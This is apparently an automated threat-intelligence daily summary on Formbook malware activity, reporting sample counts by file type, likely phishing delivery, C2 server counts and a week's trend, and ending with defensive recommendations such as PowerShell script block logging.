Daily Summary
Formbook activity increased moderately on 2026-05-01, with 39 new samples detected against a 7-day average of 32, representing a 22% surge. This rise is driven predominantly by PowerShell-based loaders, which accounted for 26 of the 39 samples, signaling a tactical shift toward fileless execution.
New Samples Detected
PowerShell scripts (.ps1) dominated today’s intake at 66.7% (26 samples), followed by JavaScript (.js) with 6 samples (15.4%). Executables (.exe) and DLLs (.dll) each contributed 2 samples, while batch (.bat), command (.cmd), and VBScript (.vbe) files made up the remainder. The heavy reliance on .ps1 scripts suggests operators are moving away from traditional compiled binaries toward lightweight, easily obfuscated payloads that can be hosted on ephemeral paste sites or embedded in phishing lures.
Distribution Methods
Based on the file type distribution, Formbook is likely delivered through email phishing campaigns using compressed archives containing .ps1 or .js attachments. The .ps1 samples may leverage PowerShell’s built-in ability to download secondary payloads from remote servers, while .js files could be used in HTML smuggling or as initial droppers. The lone .vbe sample hints at occasional use of Visual Basic scripts, possibly from older or less sophisticated distribution chains.
Detection Rate
Given the prevalence of PowerShell and JavaScript variants, detection rates for traditional signature-based AV solutions may be lower than average. Formbook operators often employ code obfuscation and dynamic loading to bypass static analysis. SOC analysts should prioritize behavioral detection rules and command-line logging to catch execution chains initiated by these script-based loaders.
C2 Infrastructure
Fifty-five new C2 servers were observed today, a high count that aligns with the increased sample volume. These servers are likely short-lived and cycled frequently to evade blocklists. No geographic patterns were provided, but analysts should expect C2s to be hosted on residential proxies or compromised VPS providers to complicate takedown efforts.
7-Day Trend
Today’s 22% increase above the 7-day average reverses a slight downward trend earlier in the week. The shift toward script-based loaders may indicate a new campaign wave rather than organic growth, requiring close monitoring over the next 48 hours.
Security Analysis
The pivot to .ps1 and .js files at the expense of .exe and .dll payloads is a notable deviation from Formbook’s historical reliance on compiled binaries. This change likely reduces file size and improves stealth against network scanners scanning for PE headers. One actionable recommendation: enable PowerShell script block logging and constrain script execution policies to signed scripts only to block unauthorized .ps1 execution. Coupling this with user awareness training on macro and script attachments can cut initial infection chains significantly.